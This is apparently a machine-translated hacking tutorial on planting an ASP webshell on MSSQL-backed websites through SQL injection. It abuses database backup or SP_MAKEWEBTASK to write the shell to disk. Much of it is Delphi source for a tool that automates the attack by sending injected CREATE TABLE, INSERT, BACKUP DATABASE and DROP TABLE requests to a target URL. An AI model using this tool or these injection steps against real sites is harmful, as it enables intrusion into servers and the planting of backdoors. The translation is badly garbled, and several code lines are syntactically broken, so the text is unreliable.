One. The principle of WebShell is injected through SQL:
N.E.V.E.R: WEBSHELL is obtained using database backup. Create a table and build a field in the table to save Trojan data. Then use the MSSQL export library file to export the entire data, and finally delete the new table.
Analysis: n.e.v.r utilizes the MSSQL backup database function. Export the data, envisure the ASP laminar, export files, export files, file names in the database, and file names in the form of .asp. Then the file is saved in the path to the web. So what is the statement that this exported ASP file is to explain <%%>? If there is a <%%> standard in the table in the database, and there is an error in this, then the ASP file we exported will be incorrect. However, this opportunity is not too big.
Let's take a look at the CZY method.
CZY method: The method of front and n.e.v.e is basically almost similar. Just use the extended stored procedure - SP_MAKEWEBTASK. This extension stored procedure is to export records in a table in the MSSQL database, saved in a file method. This method does not have any problem that we only go to read the values in a field in the table. Guide the information of the field to generate a file. The value in this field is our just added. When you join the data, please quit first, no problem is joining, and there is certainly no problem.
I have been manually tested by two methods. Use SQL to inject the vulnerability, build the table, add data to the table, and then export data, then delete the table. Both use the SQL statement. I don't have much to say this here, everyone can see the article in this issue.
two. Use Delphi to implement the preface
The principle is analyzed. How do we use Delphi to achieve their handmade? Actually, the method is very simple. Delphi provides an NMHTTP control. We use this control to submit parameters to a particular URL. Then realize our automatic injection. I will have a characteristic of this procedure to explain. It can also be said to be a defect. The program does not automatically guess the absolute path of the Web. The program does not judge the privilege of the current account of the SQL database. Why do I do this? It is very difficult because of the two of these two. So, we will not consider too much. It is not successful, you will go to see if it is generated.
three. How to get WebShell using Delphi.
The value used in the program. Let's take a look at what: URL path, remote web absolute path (getting through other methods) What method uses to get WebShell (that is, two methods, which one you choose). We also ask to click on a button to start executing commands, and click on a button to terminate his life. Finally, the name of the new table, as well as the field name of the table, once again the type of field. In the front, we put them on the program, and the controls such as selecting it will. The following we set up an option to press the New Point to press the corresponding setting. Use these corresponding settings to save it with a RECORD.
First of all, we are in the crab, squande, squirrel. Names are: URLET // URL path input box, shellpathet // Remote Trojan location, CustomBdooret / / Customize Trojan's location. Plant two Radiobutton to choose to get WebShell. The Caption is named: Backup Database and web jobs. Then put three spereadbuttion pressing. Names are: setting, start, stop, and finally put a MEMO control. To display the current information added. The work on this interface is finished. The interface is as shown:
Now let's write the program.
We first define a replad.
as follows:
Type
SetOption = RecordTableName: String; // Used to save the table name to create.
FieldName: String; // Used to save the field name to create.
FILEDTYPE: STRING; // Used to save the created field name type.
END;
The value of the FileDType field type is one of the following types:
Bigint Binary Bit Char DateTime Decimal Float Image Int Money Nchar NText Numeric Nvarchar Real SmallDatetime Smallint
SmallMoney SQL_VARIANT TEXT TIMESTAMP TINYINT UNIQUEIDENTIFIER VARBINARY VARCHAR This is the MSSQL field type value.
Refine a global variable:
VAR
ISSTOP: BOOLEAN; // Used to determine if the user presses the stop button.
All right. In the process of formal creation, we enter the default value for the RECORD record.
code show as below:
Procedure TMAINFORM.FORMCREATE (Sender: TOBJECT);
Begin
SOPTION.TABLENAME: = 'cyfd'
SOPTION.FieldName: = 'gmemo'
SOPTION.FILDTYPE: = 'Text'
END;
Now let's add the code that starts executing the command.
Define BDoorlist to TSTRINGLIST. The main purpose is to add the contents of Trojans.
Create two variables to save the URLET. And the SHELLPATHET value. Convenient program simplifies calls.
We have to check the user's input before the program starts execution.
Define a CheckInput function.
as follows:
Function checkinput: boolean;
Begin
Result: = FALSE;
if Trim (Urlet.Text) = '' THEN
Begin
Application.MessageBox ('Please enter the URL address!', 'Prompt', MB_OK MB_ICONInInformation);
EXIT;
END;
if Trim (ShellPathet.text) = '' THEN
Begin
Application.MessageBox ('Please enter the file saved address!', 'Prompt', MB_OK MB_ICONInformation);
EXIT;
END;
IF defbdoor.checked then
Begin
IF not fileexists (extractfilepath (application.exename) 'default Trojan .txt') THEN
Begin
Application.Messagebox ('Didn't find [default Trojan .txt] file!', 'Prompt', MB_OK MB_ICONInformation);
EXIT;
END;
End
Else
IF not fileexists (CustomBdooret.Text) THEN
Begin
Application.MessageBox ('Didn't find the selected Trojan file!', 'Prompt', MB_ok MB_ICONInInformation);
EXIT;
END;
RESULT: = TRUE;
END;
At the beginning to join:
If not checkinput kilover; // exits the process if the input is not legal.
Ok, if the user is nothing wrong, let's come below the code.
First we set ISSTOP to false. Create bdoorlist. Bdoorlist: = tstringlist.create;
Add Trojan content to bdoorlist.
BDoorList.LoadFromfile (CustomBdooret.Text);
Ok, here I have to say to you: When you submit data with NMHTTP. To transit some of the special symbols to the encoding. We have to replace spaces and% symbols into corresponding codes:% 20 and% 25, otherwise. Program does not enter the data.
code show as below:
BDoorList.text: = StringReplace (bdoorlist.text, '%', '% 25', [RFREPLACEALL]);
BDoorList.text: = StringReplace (bdoorlist.text, '', '% 20', [RFREPLACEAll]);
Next. We submit the function of the formulation.
Memo.lines.Add ('Construction Table ...');
Memo.lines.add (''); NMHTTP.GET (URL 'CREATE% 20Table% 20 [DBO]. [' SOption.tablename ']% 20 ([' SOption.fieldName ']% 20 [' SOption .Filedtype ']);');
This way we created a table. Then. We add records to the table:
code show as below:
Memo.lines.Add ('plus data ...');
Memo.lines.Add ('');
For i: = 0 to bdoorlist.count-1 do // Here you can use a loop to put the contents of the Trojans into the table.
Begin
If ISSTOP THEN / / This, if you stop pressing the New Jack, you will terminate the task.
Begin
Bdoorlist.free;
EXIT;
END; NMHTTP.GET (URL 'INSERT% 20InTo% 20' SOPTION.TABLENAME '% 20 (' SOPTION.FieldName ')% 20VALUES% 20 (' ' bdoorlist.strings ' ');'); ');
Memo.lines.add ('Add Line' INTOSTR (i 1));
END;
It is now exporting data to generate Trojans.
Memo.lines.Add ('exported data ...');
Memo.lines.Add ('');
If BKDATA.CHECKED THEN/ If you select the backup data, you will execute the following command.
NMHTTP.GET (URL 'DECLARE% 20 @ a% 20SysName; select% 20 @ a = db_name (); backup% 20Database% 20 @ a% 20to% 20disk =' ' shellpath ' '')
Else // If it is in the form of a web job. NMHTTP.GET (URL 'EXECUTE% 20SP_MAKEWEBTASK% 20 @ outputfile =' '' shellpath '' ', @ query =' '' 'SELECT% 20' SOption.fieldName '% 20FROM% 20' SOption.tablename '' '); we deleted the table just built. NMHTTP.GET (URL DROP% 20table% 20 [DBO]. [' SOption.tablename ']; ');
So our task is completed. Below, the variable is released.
Bdoorlist.free;
Let's add a click event to the stop to stop:
A line of code is line: isstop: = true;
The content of the main form is basically completed. Now let's look at how to set it in the setup form. It is actually very simple. A replan has been defined in the main form. We only need to enter the new value entered, then assign it to Record.
Set the primary form in the formation form. Then add two Edit controls in the interface:
The first name is: Tablenamet // guaranteed the invoice of the user.
The second name is: fieldNameet // is used to save the field name entered by the user.
Add a comboBox // to save the user selected by the user.
Name: FIELDTYPECOMBOX
OK. The interface is as follows:
code show as below:
Define a process, the main form is called this setting.
PROCEDURE SHOWSET;
Begin
Application.createform (TsetForm, SetForm);
With setform do
Begin
TableNamet.Text: = SOPTION.TABLENAME;
FieldNameet.Text: = SOPTION.FieldName;
FieldTypeCombox.ItemIndex: = FieldTypeCombox.Items.indexof (SOPTION.FiledType);
END;
SETFORM.SHOWMODAL;
Setform.free;
END;
Add the showset process in the click event set in the home form.
Here is the code to click OK.
IF checkinput then
Begin
SOPTION.TABLENAME: = trim (Tablenamet.text); // Put the user's input to Record.
SOPTION.FieldName: = trim (FieldNameet.Text);
SOPTION.FILEDTYPE: = FieldTypeCombox.text;
CLOSE;
END;
There is another checkinput here to check that the value input is not legal.
code show as below:
Function checkinput: boolean;
Begin
Result: = FALSE;
If Trim (Tablenamet.Text) = '' THEN
Begin
Application.MessageBox ('Please enter a temporary table name!', 'Prompt', MB_OK MB_ICONInformation;
EXIT;
END;
If Trim (FieldNameet.Text) = 'THEN
Begin
Application.MessageBox ('Please enter the field name!', 'Prompt', MB_ok MB_ICONInInformation;
END;
RESULT: = TRUE;
END;
It's over here.
